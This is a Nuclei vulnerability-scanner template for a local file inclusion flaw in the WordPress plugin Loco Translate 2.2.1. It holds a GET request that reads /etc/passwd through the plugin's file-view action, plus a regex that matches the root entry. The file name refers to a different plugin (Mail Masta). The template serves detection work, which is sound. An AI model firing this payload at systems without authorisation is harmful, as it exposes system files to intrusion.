nuclei-templates/vulnerabilities/wordpress/wp-mail-masta-lfi.yaml

19 lines
501 B
YAML
Raw Normal View History

2021-05-27 03:15:53 +00:00
id: wp-loco-translate-lfi
info:
name: WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/46619
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body